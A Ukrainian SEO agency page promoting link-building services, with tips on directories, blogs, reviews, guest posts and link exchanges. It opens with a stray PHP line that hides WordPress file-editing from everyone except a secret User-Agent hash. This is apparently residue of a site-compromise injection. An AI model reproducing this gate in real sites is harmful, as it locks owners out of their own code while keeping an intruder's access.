if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Лінкбілдінг у Києві, Україні за доступними цінами від агентства PATProfi

Лінкбілдінг

Один із трендів, через який постійно сперечаються на форумах. Не дивлячись на легкий хейт, більшість сайтів із ТОП так чи інакше працювали з посиланнями. Ми регулярно вимірюємо ефективність посилань в сервісі, бачимо стабільний вплив на результат: під час просування в пошуковій системі він складає до 40%. Це дуже непогані цифри, які демонструють всю важливість адекватної стратегії використання посилань.

Лінкбілдерам необхідно пам’ятати про наступне:

  • Розміщуйтесь в бізнес-каталогах. Зареєструйтесь на всіх доступних майданчиках та вкажіть посилання на Ваш сайт. Так Ви отримаєте зростання маси посилань та джерело трафіку.
  • Створіть власний блог або інформаційне посилання. Вмієте створювати контент – пишіть в блозі. Публікуючи якісні статті, Ви не тільки покращите власний рейтинг SEO, але й зможете знайти нову аудиторію.
  • Додавайте посилання в коментарі користувачів. Відгуки – ще один актив для Вашого бізнесу. Рекомендаціям повірять більше, аніж рекламі. Це робить відгуки потужним маркетинговим інструментом. Просіть Ваших клієнтів розміщувати чесні відгуки з посиланням на сайт.
  • Проникніть на авторитетні сайти. Журналісти та редактори постійно шукають якісний контент для своїх майданчиків.
  • Рівняйтесь на конкурентів. В основі ефективної стратегії використання посилань лежить конкурентний аналіз. Вивчайте анкори, сайти-донори, які використовують Ваші конкуренти.
  • Працюйте з перевіреними біржами. Практично всі види посилань можна отримати за допомогою перевірених бірж.
hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.